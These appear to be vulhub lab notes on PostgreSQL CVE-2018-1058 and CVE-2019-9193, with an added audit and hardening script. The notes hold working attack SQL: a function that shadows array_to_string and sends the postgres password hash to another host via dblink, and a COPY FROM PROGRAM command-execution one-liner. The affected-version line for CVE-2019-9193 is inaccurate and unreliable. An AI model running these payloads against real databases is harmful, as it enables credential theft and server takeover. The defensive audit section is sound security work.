(CVE-2018-1058)(CVE-2019-9193)
PostgreSQL privilege escalation vulnerability (CVE-2018-1058)

psql --host 192.168.85.130 --username vulhub

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=192.168.85.132 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;


docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub
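
Added example, not part of the original notes: an audit and hardening script for the CVE-2018-1058 condition shown above, where a function in schema public shadows a pg_catalog function. It assumes a superuser session in the lab database vulhub and the role name vulhub from the psql command above; the hardening statements are the search_path measures recommended in the PostgreSQL project's guidance for this CVE.

```sql
-- Added audit example for CVE-2018-1058; run as a superuser in the database
-- being checked (assumed here: the lab database "vulhub").
BEGIN;
-- Resolve every function and operator below from pg_catalog only, so the
-- audit itself cannot be hijacked by a shadowing object.
SET LOCAL search_path = pg_catalog;

-- Functions outside the system schemas whose name also exists in pg_catalog.
-- A row such as public.array_to_string(anyarray, text) owned by a
-- non-superuser is what the CREATE FUNCTION above leaves behind.
SELECT n.nspname                                 AS schema_name,
       p.proname                                 AS function_name,
       pg_get_function_identity_arguments(p.oid) AS args,
       pg_get_userbyid(p.proowner)               AS owner,
       l.lanname                                 AS language,
       left(p.prosrc, 80)                        AS body_start
FROM   pg_proc p
JOIN   pg_namespace n ON n.oid = p.pronamespace
JOIN   pg_language  l ON l.oid = p.prolang
WHERE  n.nspname <> 'information_schema'
AND    n.nspname NOT LIKE 'pg\_%'
AND    EXISTS (SELECT 1
               FROM   pg_proc c
               JOIN   pg_namespace cn ON cn.oid = c.pronamespace
               WHERE  cn.nspname = 'pg_catalog'
               AND    c.proname = p.proname)
ORDER  BY 1, 2;

-- Roles that may create objects in schema public, the precondition for
-- planting such a function (superusers always appear in this list).
SELECT r.rolname
FROM   pg_roles r
WHERE  has_schema_privilege(r.rolname, 'public', 'CREATE')
ORDER  BY 1;
COMMIT;

-- Hardening: stop ordinary roles from creating objects in public, and keep
-- public out of the unprivileged role's default search_path.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
ALTER ROLE vulhub SET search_path = "$user";
```

Any row returned by the first query should be reviewed and dropped if it was not created deliberately before a superuser runs pg_dump or other maintenance against the database.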




PostgreSQL high-privilege command execution vulnerability (CVE-2019-9193)
Affected versions: PostgreSQL 9.3.x and earlier, and 11.x

SQL attack syntax:
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;



